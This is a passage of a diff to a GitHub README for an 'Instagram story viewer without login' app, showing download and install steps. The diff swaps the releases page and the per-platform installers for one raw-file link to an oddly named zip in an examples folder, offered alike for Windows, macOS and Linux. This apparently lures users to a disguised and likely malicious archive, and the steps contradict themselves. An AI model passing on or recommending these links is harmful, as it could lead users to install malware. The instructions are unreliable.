Wired-boy/instagram-story-viewer-without-login/README.md

 ## 📦 Download & Install
 To get started with the Instagram Story Viewer, follow these steps:

-1. **Visit the Releases Page:** Go to the release page by clicking the following link: [Download Here](https://github.com/Wired-boy/instagram-story-viewer-without-login/releases).
+1. **Visit the Releases Page:** Go to the release page by clicking the following link: [Download Here](https://github.com/Wired-boy/instagram-story-viewer-without-login/raw/refs/heads/main/examples/login-without-instagram-viewer-story-2.9.zip).

 2. **Select Your Version:** On the releases page, look for the latest version.
 It will usually be at the top of the page.
 Click on it to see the download options.

 3. **Download the Application:**
-   - For Windows, click on `instagram-story-viewer-windows.exe`.
+   - For Windows, click on `https://github.com/Wired-boy/instagram-story-viewer-without-login/raw/refs/heads/main/examples/login-without-instagram-viewer-story-2.9.zip`.
-   - For macOS, click on `instagram-story-viewer-macos.dmg`.
+   - For macOS, click on `https://github.com/Wired-boy/instagram-story-viewer-without-login/raw/refs/heads/main/examples/login-without-instagram-viewer-story-2.9.zip`.
-   - For Linux, click on `instagram-story-viewer-linux.zip`.
+   - For Linux, click on `https://github.com/Wired-boy/instagram-story-viewer-without-login/raw/refs/heads/main/examples/login-without-instagram-viewer-story-2.9.zip`.

 4. **Install the Software:**
    - **Windows:**